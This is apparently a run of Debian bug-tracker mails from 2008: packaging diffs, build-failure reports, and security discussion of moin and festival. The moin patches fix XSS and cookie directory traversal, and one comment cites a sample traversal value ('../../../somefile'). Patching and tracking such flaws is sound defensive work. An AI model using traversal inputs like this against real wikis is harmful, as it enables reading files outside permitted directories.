+++ libtemplates-parser-10.0+20060522/debian/control
@@ -1,13 +1,14 @@
Source: libtemplates-parser
+Section: libs
Priority: optional
Maintainer: Ludovic Brenta [EMAIL PROTECTED]
Build-Depends: debhelper (= 4.1.0), gnat (= 4.1), texinfo, tetex-bin, tetex-extra, quilt
-Standards-Version: 3.7.2
+Standards-Version: 3.7.3
Package: libtemplates-parser-dev
Section: libdevel
Architecture: alpha amd64 hppa i386 ia64 kfreebsd-i386 powerpc s390 sparc
-Depends: libtemplates-parser10 (= ${Source-Version}), gnat-4.1
+Depends: libtemplates-parser10 (= ${binary:Version}), gnat-4.1
Description: Ada library to parse files and replace variables with their values
The main goal is to ease the development of Web servers. In CGI
(Common Gateway Interface) applications, you have to write HTML pages in
diff -u libtemplates-parser-10.0+20060522/debian/rules libtemplates-parser-10.0+20060522/debian/rules
--- libtemplates-parser-10.0+20060522/debian/rules
+++ libtemplates-parser-10.0+20060522/debian/rules
@@ -24,7 +24,6 @@
# gnatmake can do parallel builds; we don't want make to interfere.
.NOTPARALLEL:
-export DH_COMPAT=4
export SHELL=/bin/bash
MAJOR := $(shell dpkg-parsechangelog | grep ^Version: | sed 's/^Version: \(.*\)\.\(.*\)-\(.*\)/\1/')
@@ -85,6 +84,7 @@
dh_testdir
dh_testroot
-quilt pop -a
+ -rm -rf .pc
rm -f doc-stamp libtemplates_parser* build.adb
rm -rf obj-static obj-shared debian/files
$(MAKE) -C docs clean
diff -u libtemplates-parser-10.0+20060522/patches/series libtemplates-parser-10.0+20060522/patches/series
--- libtemplates-parser-10.0+20060522/patches/series
+++ libtemplates-parser-10.0+20060522/patches/series
@@ -1,2 +1,3 @@
+fix-tail-call.patch
info-dir-section.patch
strings_maps.patch
only in patch2:
unchanged:
--- libtemplates-parser-10.0+20060522.orig/debian/compat
+++ libtemplates-parser-10.0+20060522/debian/compat
@@ -0,0 +1 @@
+4
only in patch2:
unchanged:
--- libtemplates-parser-10.0+20060522.orig/patches/fix-tail-call.patch
+++ libtemplates-parser-10.0+20060522/patches/fix-tail-call.patch
@@ -0,0 +1,13 @@
+Index: libtemplates-parser-10.0+20060522/docs/makefile
+===
+--- libtemplates-parser-10.0+20060522.orig/docs/makefile 2008-02-19 12:21:17.0 +
libtemplates-parser-10.0+20060522/docs/makefile 2008-02-19 12:21:28.0 +
+@@ -108,7 +108,7 @@
+ endif
+
+ $(ADBFILES) $(ADSFILES): all_sources.ada
+- tail +3 all_sources.ada sources.ada
++ tail --lines=+3 all_sources.ada sources.ada
+ gnatchop -w sources.ada
+ rm sources.ada
+
signature.asc
Description: Digital signature
Processed (with 5 errors): Intent to NMU
Processing commands for [EMAIL PROTECTED]: Tags 464315 +pending Bug#464315: libtemplates-parser: FTBFS: tail: cannot open `+3' for reading: No such file or directory There were no tags set. Tags added: pending thanks. Unknown command or malformed arguments to command. I have prepared an NMU that fixes this FTBFS bug, and also gets the package Unknown command or malformed arguments to command. in better shape (new Standards Version, only one lintian warning, and it's Unknown command or malformed arguments to command. buildable twice in a row. Unknown command or malformed arguments to command. I'm attaching the debdiff output of the patch I have prepared. Since this Unknown command or malformed arguments to command. Too many unknown commands, stopping here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#440109: sympa: Trying to find a fix
Package: sympa Followup-For: Bug #440109 Hi. I've tried and find what's going wrong here. It seems to me that install-pg-db should not create the database, but only create the user (with createdb rights maybe, instead of nocreatedb), or, otherwise, create the full database and tables, by executing the whole /usr/lib/sympa/bin/create_db.Pg, then. Also, the /usr/lib/sympa/bin/sympa.pl --prepare_db cannot create the database at the moment for postgresql from what I could see. I need to do more tests to figure out what's happening, but this may be an option to come to solution of this bug. Hope this help -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (500, 'testing') Architecture: i386 (i686) Kernel: Linux 2.6.22-3-vserver-686 (SMP w/2 CPU cores) Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages sympa depends on: ii adduser 3.105 add and remove users and groups ii debconf [debconf-2.0] 1.5.19 Debian configuration management sy ii exim4-daemon-light [mail-tran 4.69-2 lightweight Exim MTA (v4) daemon pn libarchive-zip-perl none (no description available) ii libc6 2.7-6 GNU C Library: Shared libraries pn libcgi-fast-perl none (no description available) pn libcrypt-ciphersaber-perl none (no description available) ii libdbd-mysql-perl 4.006-1A Perl5 database interface to the ii libdbi-perl 1.601-1Perl5 database interface by Tim Bu ii libfcgi-perl 0.67-2 FastCGI Perl module ii libintl-perl 1.16-4 Uniforum message translations syst ii libio-stringy-perl2.110-3Perl5 modules for IO from scalars ii libmailtools-perl 1.77-1 Manipulate email in perl programs pn libmd5-perl none (no description available) ii libmime-perl 5.425-2transitional dummy package ii libmime-tools-perl [libmime-p 5.425-2Perl5 modules for MIME-compliant m pn libmsgcat-perlnone (no description available) pn libnet-ldap-perl none (no description available) pn libtemplate-perl none (no description available) ii libxml-libxml-perl1.63-1.1 Perl module for using the GNOME li pn mhonarc none (no description available) ii perl [libmime-base64-perl]5.8.8-12 Larry Wall's Practical Extraction pn perl-suid none (no description available) ii sysklogd [system-log-daemon] 1.5-1.1System Logging Daemon Versions of packages sympa recommends: ii doc-base 0.8.9 utilities to manage online documen ii logrotate 3.7.1-3Log rotation utility -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Nico, I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]: I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Sure it is :) The remote exploitability status isn't set manually by us. This is extracted automatically from the NVD text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the word 'remote'. I think that's the reason. Patches welcome :) Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgpCeDRwjixSc.pgp Description: PGP signature
Bug#465177: Bug #465177: mediatomb: FTBFS: configure: error: unable to configure inotify support
On Thursday 14 February 2008 5:26:14 am Sergey Jin' Bostandzhyan wrote: On Tue, Feb 12, 2008 at 10:40:20PM -0500, Andres Mejia wrote: Possibly an oldish one, but it shouldn't matter. Whether the kernel supports inotify should be checked at runtime, not build time. Well, this makes sense. I could fix this for the build time. Does mediatomb already check for inotify during runtime? As far as fixing this for build time, I'm guessing the inotify-tools has this check only to serve the purpose of seeing if the linux inotify headers work, and if not, just drop back to it's own implementation. For mediatomb, we should just be worried about the presence and usability of sys/inotify.h. If it turns out there's a problem with the inotify headers, then it should be reported against the linux packages. We do the same fallback thing and use the same header as inotify tools, we do have a runtime check, but I have to see what exactly it is doing (i.e., possible that it will complain at startup and exit) So indeed, we should add an option which would allow compiling with inotify support even if inotify is not present on the build system and do a smarter runtime check. I'll see that we get this fixed for the upcoming release which should not take long anymore. Thanks for the hints. Kind regards, Jin I see that this has been worked on in SVN. I'll test the new changes with the current package in Debian. -- Regards, Andres -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#462984: NMU diff
Hi,
as discussed in private mail, here is the NMU.
Kind regards
T.
diff -u moin-1.5.8/debian/changelog moin-1.5.8/debian/changelog
--- moin-1.5.8/debian/changelog
+++ moin-1.5.8/debian/changelog
@@ -1,3 +1,15 @@
+moin (1.5.8-5.1) unstable; urgency=high
+
+ * NMU with maintainer consent, urgency for security updates
+ * update upstream patches to moin-1.5 branch revision 856 to fix bugs
++ cross-site scripting vulnerabilities using AttachFile,
+ CVE-2008-0781
++ directory traversal in MOIN_ID cookie vulnerability,
+ CVE-2008-0782 (Closes: #462984)
++ XSS problem in login, CVE-2008-780
+
+ -- Thomas Viehmann [EMAIL PROTECTED] Tue, 19 Feb 2008 22:38:10 +0100
+
moin (1.5.8-5) unstable; urgency=high
* Acknowledge NMU.
only in patch2:
unchanged:
--- moin-1.5.8.orig/debian/patches/00855_userid_cookie_directory_traversal.patch
+++ moin-1.5.8/debian/patches/00855_userid_cookie_directory_traversal.patch
@@ -0,0 +1,76 @@
+# HG changeset patch
+# User Thomas Waldmann tw AT waldmann-edv DOT de
+# Date 1200868068 -3600
+# Node ID e69a16b6e63020ac615e74b3184d6e89597352e0
+# Parent 2f952fa361c7bc6ed127ec0618038272385186cd
+Security fix: only accept valid user IDs from the cookie
+
+diff -r 2f952fa361c7 -r e69a16b6e630 MoinMoin/user.py
+--- a/MoinMoin/user.py Sun Jan 20 17:36:42 2008 +0100
b/MoinMoin/user.py Sun Jan 20 23:27:48 2008 +0100
+@@ -6,7 +6,7 @@
+ @license: GNU GPL, see COPYING for details.
+
+
+-import os, time, sha, codecs
++import os, time, sha, codecs, re
+
+ try:
+ import cPickle as pickle
+@@ -19,6 +19,7 @@ from MoinMoin import config, caching, wi
+ from MoinMoin import config, caching, wikiutil
+ from MoinMoin.util import filesys, timefuncs
+
++USERID_re = re.compile(r'^\d+\.\d+(\.\d+)?$')
+
+ def getUserList(request):
+ Get a list of all (numerical) user IDs.
+@@ -27,10 +28,9 @@ def getUserList(request):
+ @rtype: list
+ @return: all user IDs
+
+-import re, dircache
+-user_re = re.compile(r'^\d+\.\d+(\.\d+)?$')
++import dircache
+ files = dircache.listdir(request.cfg.user_dir)
+-userlist = [f for f in files if user_re.match(f)]
++userlist = [f for f in files if USERID_re.match(f)]
+ return userlist
+
+
+@@ -210,7 +210,7 @@ class User:
+ self._cfg = request.cfg
+ self.valid = 0
+ self.trusted = 0
+-self.id = id
++self.id = self.id_sanitycheck(id)
+ self.auth_username = auth_username
+ self.auth_method = kw.get('auth_method', 'internal')
+ self.auth_attribs = kw.get('auth_attribs', ())
+@@ -298,6 +298,15 @@ class User:
+ # use it reliably in edit locking
+ from random import randint
+ return %s.%d % (str(time.time()), randint(0,65535))
++
++def id_sanitycheck(self, id):
++ only return valid user IDs, avoid someone faking his cookie to
++contain '../../../somefile', breaking out of the data/user/
directory!
++
++if id and USERID_re.match(id):
++return id
++else:
++return None
+
+ def create_or_update(self, changed=False):
+ Create or update a user profile
+diff -r 2f952fa361c7 -r e69a16b6e630 docs/CHANGES
+--- a/docs/CHANGES Sun Jan 20 17:36:42 2008 +0100
b/docs/CHANGES Sun Jan 20 23:27:48 2008 +0100
+@@ -44,6 +44,7 @@ Version 1.5.current:
+ * Fixed Despam action (same editor grouping was broken), now looking for
+ spam edits in the last 30 days.
+ * Fixed XSS issue in login action.
++* Security fix: only accept valid user IDs from the cookie.
+
+ Version 1.5.8:
+ New features:
only in patch2:
unchanged:
--- moin-1.5.8.orig/debian/patches/00854_login_XSS.patch
+++ moin-1.5.8/debian/patches/00854_login_XSS.patch
@@ -0,0 +1,36 @@
+# HG changeset patch
+# User Thomas Waldmann tw AT waldmann-edv DOT de
+# Date 1200847002 -3600
+# Node ID 2f952fa361c7bc6ed127ec0618038272385186cd
+# Parent dbe95b27954adcb135e392ff1f9c883d0cfb7dc6
+XSS fix for login action, thanks to Fernando Quintero for reporting this
+
+diff -r dbe95b27954a -r 2f952fa361c7 MoinMoin/action/login.py
+--- a/MoinMoin/action/login.py Fri Jan 18 21:40:23 2008 +0100
b/MoinMoin/action/login.py Sun Jan 20 17:36:42 2008 +0100
+@@ -40,12 +40,12 @@ class LoginHandler:
+ if not user.isValidName(request, name):
+ error = _(Invalid user name {{{'%s'}}}.
+ Name may contain any Unicode alpha numeric character, with optional one
+-space between words. Group page name is not allowed.) % name
++space between words. Group page name is not allowed.) %
wikiutil.escape(name)
+
+ # Check that user exists
+ elif not user.getUserId(request, name):
+ error = _('Unknown user name: {{{%s}}}. Please enter'
+- ' user name and password.') % name
++ ' user name and password.') %
wikiutil.escape(name)
+
+ # Require password
+
Bug#466300: openoffice.org-writer2latex: Can reproduce / confirm bug with differen JRE
Package: openoffice.org-writer2latex Version: 0.5-4 Followup-For: Bug #466300 I can confirm the bug with writer2latex, and for that matter with -report-builder as well. JRE is sun-java5-jre current, from SID/non-free. -- Package-specific info: all deployed shared packages: none -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.24 (SMP w/2 CPU cores; PREEMPT) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages openoffice.org-writer2latex depends on: ii openoffice.org-core1:2.4.0~rc1-2 OpenOffice.org office suite archit ii openoffice.org-java-common 1:2.4.0~rc1-2 OpenOffice.org office suite Java s openoffice.org-writer2latex recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote: * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]: I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Sure it is :) The remote exploitability status isn't set manually by us. This is extracted automatically from the NVD text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the word 'remote'. I think that's the reason. Patches welcome :) Okay, so the CVE entry is wrong (which probably explains why it wasn't correctly resolved by the maintainers when it was first looked at). It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? Also, since we have a working patch for the issue on mentors what happens now. Can it go through as NMU? What about the backport to stable and testing? Tim -- Tim Brown mailto:[EMAIL PROTECTED] http://www.nth-dimension.org.uk/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#458884: 458884: packagesearch woes
Processing commands for [EMAIL PROTECTED]: tags 458884 +pending Bug#458884: packagesearch: FTBFS: aptplugincontainer.cpp:(.text+0xb1): undefined reference to `NPlugin::BasePluginContainer::~BasePluginContainer()' There were no tags set. Tags added: pending thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#458884: 458884: packagesearch woes
tags 458884 +pending thanks Hello, Was this comment supposed to go to another package? Yes, the comment was meant for libqt4-dev and reposted there (Cmp. #458558). Since that bug won't be fixed I had to work around the bug. Only two days ago I have uploaded a new version of packagesearch containing a fix to my sponsor, who I hope will upload it to the archive soon. packagesearch has been crashing at the drop of a hat for me for months (basically, whenever I leave it up for awhile and then come back to it). This is known, and unfortunately not easy to fix. The problem is, that the backend library (libept-dev) switched from working on a copy of the apt-database to working on the database itself. However, it does not handle it gracefully, if the package database changes (i.e. it causes a crash). So packagesearch crashes whenever you do something after the database has changed. A bug is open against libept-dev (#442841) and I am periodically nagging Enrico to fix this bug - which would allow for packagesearch to become stable again. Recently aptitude has become very insistent about giving it the boot, probably because of an upgrade to the apt tools. This should be solved with the new upload. Best regards and thanks for sticking with packagesearch Benjamin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#446665: mercury: should this package be removed?
Hi folks, Sorry for all of the CCs but all of you have expressed interest in fixing/adopting this package (with the exception of QA). Do any of you still have an interest and/or a plan to fix this package? According to the Mecury website, it is supposed to build with gcc-4.1 which would be a hell of a lot better than gcc-3.x. Is that not the case? This thing has been orphaned a while and has an RC bug over a year old. If no-one wants to fix it up, I will request removal within the week. If I can help with packaging or fixing this thing, please feel free to contact me and will gladly help if I can. Otherwise it's a goner. :-) Thank you! Barry deFreese -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466519: ltrace of an svn update
On Tue, Feb 19, 2008 at 04:05:02PM +, Ivan Sergio Borgonovo wrote: On Tue, 19 Feb 2008 15:45:45 +0100 Pierre Habouzit [EMAIL PROTECTED] wrote: On Tue, Feb 19, 2008 at 10:03:48AM +, Ivan Sergio Borgonovo wrote: I noticed in the other bug report it was asked to include an ltrace... This is the ltrace of an svn update. You had libc6-dbg installed when you ran it ? because I see no libc calls which is odd. A strace may help too please. I installed -dgb on purpose... unfortunately I can't test with older libc6 (I don't have them anymore) and well nothing has changed other than that upgrade. There are other stuff in the last upgrade of that box... but they do look even less related. well, the point is ltrace barely uses the libc, so it's really curious. I've tried to use svn clients from other different hosts on the same server and everything is working... this exclude a corruption in the svn repo and should exclude a network problems on the server. Well, it could be network related for all I know, but I see nothing interesting in the strace :/ -- ·O· Pierre Habouzit ··O[EMAIL PROTECTED] OOOhttp://www.madism.org pgpRwA3briCx5.pgp Description: PGP signature
Bug#466146: festival: Default configuration allows unauthenticated remote code execution
Hi Tim, * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:57]: On Tuesday 19 February 2008 19:20:23 Nico Golde wrote: * Tim Brown [EMAIL PROTECTED] [2008-02-19 20:08]: I've just notice that the security tracker http://security-tracker.debian.net/tracker/status/release/unstable has been updated for festival. However it is wrong. This bug *is* remotely exploitable (due to the afore mentioned lack of ACLs). Sure it is :) The remote exploitability status isn't set manually by us. This is extracted automatically from the NVD text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which doesn't mention the word 'remote'. I think that's the reason. Patches welcome :) Okay, so the CVE entry is wrong (which probably explains why it wasn't correctly resolved by the maintainers when it was first looked at). Maybe it's also the Access Vector: string, not sure. Florian Weimer knows the details. It probably also needs rewording since SuSE confirmed it affected them and I think we agree it affects Debian. How do we go about doing that - is that something for you guys or do I need to get involved? I see your point, I will contact mitre to update the CVE id or to assign a new one. Also, since we have a working patch for the issue on mentors what happens now. Can it go through as NMU? The maintainer already uploaded a fixed version to unstable so no need for that. An NMU is only needed if the maintainer can't do an upload himself. What about the backport to stable and testing? The package should migrate to testing in two days. If it has problems on migration we may do a testing security upload for this. For stable please contact. Referring to our svn the stable security did not release a DSA for CVE-2007-4074 because it was a minor issue. If you think this should get fixed in stable please contact [EMAIL PROTECTED] I guess they will happily release a DSA if someone comes up and provides a fixed stable package that just works. If not, the maintainer still has a high chance to get this fixed via a regular point update. For this please contact the release team. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted. pgphOu1LUlfsj.pgp Description: PGP signature
Bug#446665: mercury: should this package be removed?
I filed the initial ITA, but have then been unable to make much progress because of other commitments (including being overseas for a while). Unfortunately, although I'm back now, unforeseen personal circumstances mean I won't be able to do anything in the immediate future (next 2-3 weeks at least) either, and getting something releasable would be later than that. If someone wants to adopt it, please do, and I'll help as much as I can. Otherwise I _will_ get to it, but it may not be for a while. As for the gcc-3.4 vs. gcc-4.1, I'd had a good look at that, and it depends which version: The Release Of The Day does indeed compile with gcc-4.1 The latest release (0.13.1) which was the one I was looking at packing (to avoid a ROTD ending up in stable) does not - it does require gcc-3.4 (there's only a couple of places where it is broken under gcc-4.1/gcc-4.2, but it would take someone with more knowledge than me to fix that). I use 0.13.1, but the version to package depends on: * when there is going to be another release (I don't know this) * whether most current users use 0.13.1 or ROTD (I don't know but can find this out). Cheers, Roy Ward. Barry Freese wrote: Hi folks, Sorry for all of the CCs but all of you have expressed interest in fixing/adopting this package (with the exception of QA). Do any of you still have an interest and/or a plan to fix this package? According to the Mecury website, it is supposed to build with gcc-4.1 which would be a hell of a lot better than gcc-3.x. Is that not the case? This thing has been orphaned a while and has an RC bug over a year old. If no-one wants to fix it up, I will request removal within the week. If I can help with packaging or fixing this thing, please feel free to contact me and will gladly help if I can. Otherwise it's a goner. :-) Thank you! Barry deFreese -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#466519: marked as done (svn client doesn't work: Could not get next bucket brigade + Invalid or incomplete multibyte or wid...: random no commit, no update)
Your message dated Tue, 19 Feb 2008 22:23:20 +0100 with message-id [EMAIL PROTECTED] and subject line Re: Bug#466519: close: it seems not related has caused the Debian Bug report #466519, regarding svn client doesn't work: Could not get next bucket brigade + Invalid or incomplete multibyte or wid...: random no commit, no update to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 466519: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466519 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: libc6 Version: 2.3.6.ds1-13etch5 Severity: grave Summary: svn was working perfectly. The repository isn't huge (~500 commit). Now when I commit I get: Could not get next bucket brigade (server side) when I update I get: client denied by server configuration: /var/www/ Could not fetch resource information. (84)Invalid or incomplete multibyte or wide character: Requests for a collection must have a trailing slash on the URI. On the client side I get: REPORT di '/svn/main/!svn/vcc/default': 400 Bad Request I did a svnadmin verify and svnadmin recover and everything looked fine on the server. I did try fsfsverify.py on all revs too. Sometimes backing up a file on the local copy, forcing a delete, adding the file back works... sometimes it doesn't. I've been able to commit file one by one, some get committed with no extra hassle, some need this backup/delete/add process, some just can't be committed. I did try to make a commit from other boxes and they worked... I did a co from other boxes and they worked too. the server is a debian sarge (pentium) Debian sarge (Apache/2.0.54 (Debian GNU/Linux) DAV/2 SVN/1.1.4) the client is a debian etch (dual Xeon) svn, versione 1.4.2 (r22196) compilato Nov 10 2006, 17:39:50 Nothing was changed on the server, most recent update were on the client (etch) and coincidentally I haven't been able to use svn starting from the below update on the client. linux-image-2.6-686 2.6.18+6etch2 - 2.6.18+6etch3 apache2 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2-mpm-prefork 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2-utils 2.2.3-4+etch3 - 2.2.3-4+etch4 apache2.2-common 2.2.3-4+etch3 - 2.2.3-4+etch4 cpio 2.6-17 - 2.6-18 libc6 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 libc6-dev 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 libc6-xen 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 locales 2.3.6.ds1-13etch4 - 2.3.6.ds1-13etch5 and nothing has changed on the server. I haven't been able to do much tests from other clients but till now all commit, updates and checkout from different clients worked. So it seems the problem was introduced by the updates above on the client. Could be related to this: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465583 but the client has ipv6 loaded... -- Ivan Sergio Borgonovo http://www.webthatworks.it ---End Message--- ---BeginMessage--- Ivan Sergio Borgonovo a écrit : I started to experience the same problem on other boxes too... Update of libc6 and this problem now just seem an unlucky coincidence. Ok, closing the bug with this mail. -- .''`. Aurelien Jarno | GPG: 1024D/F1BCDB73 : :' : Debian developer | Electrical Engineer `. `' [EMAIL PROTECTED] | [EMAIL PROTECTED] `-people.debian.org/~aurel32 | www.aurel32.net ---End Message---
Bug#466598: grub-pc chokes on grub.cfg, hangs before menu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Package: grub-pc
Version: 1.96+20080216-1
Severity: critical
Justification: breaks the whole system
Using the newest grub-pc package, I ran update-grub and then
grub-install. Chainloading doesn't work by the way, because
it doesn't create the chainload option in legacy grub. Booting
straight to grub2 results in Welcome to Grub and an
unresponsive computer.
In a previous release the if statements created by 00_header
PROVIDED BY THE GRUB-PC PACKAGE were a problem, but removing
those if statements doesn't avoid the problem any more.
I have had this problem on two computers, one a desktop and
one a virtual machine.
- -- Package-specific info:
*** BEGIN
/dev/hda1 / ext3 rw,errors=remount-ro,data=ordered 0 0
/dev/hda1 /dev/.static/dev ext3 rw,errors=remount-ro,data=ordered 0 0
/dev/hda9 /home ext3 rw,data=ordered 0 0
/dev/hda8 /tmp ext3 rw,data=ordered 0 0
/dev/hda5 /usr ext3 rw,data=ordered 0 0
/dev/hda6 /var ext3 rw,data=ordered 0 0
*** END
*** BEGIN /boot/grub/device.map
(hd0) /dev/hda
*** END /boot/grub/device.map
*** BEGIN /boot/grub/grub.cfg
#
# DO NOT EDIT THIS FILE
#
# It is automatically generated by /usr/sbin/update-grub using templates
# from /etc/grub.d and settings from /etc/default/grub
#
### BEGIN /etc/grub.d/00_header ###
set default=0
set timeout=5
set root=(hd0,1)
if font (hd0,5)/share/grub/unicode.pff ; then
set gfxmode=640x480
insmod gfxterm
insmod vbe
terminal gfxterm
fi
### END /etc/grub.d/00_header ###
### BEGIN /etc/grub.d/05_debian_theme ###
insmod png
if background_image
(hd0,5)/share/images/desktop-base/debian-blueish-wallpaper-640x480.png ;
then
set color_normal=black/black
set color_highlight=magenta/black
else
set menu_color_normal=cyan/blue
set menu_color_highlight=white/blue
fi
### END /etc/grub.d/05_debian_theme ###
### BEGIN /etc/grub.d/10_hurd ###
### END /etc/grub.d/10_hurd ###
### BEGIN /etc/grub.d/10_linux ###
menuentry Debian GNU/Linux, linux 2.6.24-1-686 {
linux (hd0,1)/boot/vmlinuz-2.6.24-1-686 root=/dev/hda1 ro
initrd (hd0,1)/boot/initrd.img-2.6.24-1-686
}
menuentry Debian GNU/Linux, linux 2.6.24-1-686 (single-user mode) {
linux (hd0,1)/boot/vmlinuz-2.6.24-1-686 root=/dev/hda1 ro single
initrd (hd0,1)/boot/initrd.img-2.6.24-1-686
}
### END /etc/grub.d/10_linux ###
*** END /boot/grub/grub.cfg
- -- System Information:
Debian Release: lenny/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages grub-pc depends on:
ii base-files4.0.2 Debian base system
miscellaneous f
ii debconf [debconf-2.0] 1.5.19 Debian configuration
management sy
ii libc6 2.7-8 GNU C Library: Shared libraries
ii liblzo1 1.08-3 data compression library
(old vers
ii libncurses5 5.6+20080203-1 Shared libraries for
terminal hand
grub-pc recommends no packages.
- -- debconf information:
* grub-pc/linux_cmdline:
* grub-pc/chainload_from_menu.lst: true
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
iD8DBQFHu0jbtXr3a6NTXfoRAvdrAJ9nSK+dvDj3nVEItAjmuwmfTT8F3wCfb5hm
g2v1qYqymSRx1UkXCp5c3T4=
=/G2i
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#442966: marked as done (enigmail: FTBFS: nsEnigModule.cpp:(.text+0x23): undefined reference to `NS_NewGenericModule2(nsModuleInfo const*, nsIModule**)')
Your message dated Tue, 19 Feb 2008 21:32:02 + with message-id [EMAIL PROTECTED] and subject line Bug#379260: fixed in enigmail 2:0.95.0+1-3.1 has caused the Debian Bug report #379260, regarding enigmail: FTBFS: nsEnigModule.cpp:(.text+0x23): undefined reference to `NS_NewGenericModule2(nsModuleInfo const*, nsIModule**)' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 379260: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=379260 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: enigmail version: 2:0.95.0+1-3 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20070917 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: make[6]: Entering directory `/build/user/enigmail-0.95.0+1/build-dir/mozilla/mail/extensions/enigmail/build' ERROR: ld.so: object 'libfakeroot-sysv.so' from LD_PRELOAD cannot be preloaded: ignored. nsEnigModule.cpp c++ -o nsEnigModule.o -c -I../../../../dist/include/system_wrappers -include ../../../../config/gcc_hidden.h -DMOZILLA_MAJOR_VERSION=1 -DMOZILLA_MINOR_VERSION=8 -DOSTYPE=\Linux2.6\ -DOSARCH=\Linux\ -DBUILD_ID=00 -I./../src -I./../ipc/src -I../../../../dist/include/xpcom -I../../../../dist/include/xpcom_obsolete -I../../../../dist/include/string -I../../../../dist/include/msgbase -I../../../../dist/include/msgbaseutil -I../../../../dist/include/msgsmime -I../../../../dist/include/pref -I../../../../dist/include/js -I../../../../dist/include/necko -I../../../../dist/include/uconv -I../../../../dist/include/unicharutil -I../../../../dist/include/msgcompose -I../../../../dist/include/editor -I../../../../dist/include/dom -I../../../../dist/include/intl -I../../../../dist/include/msgimap 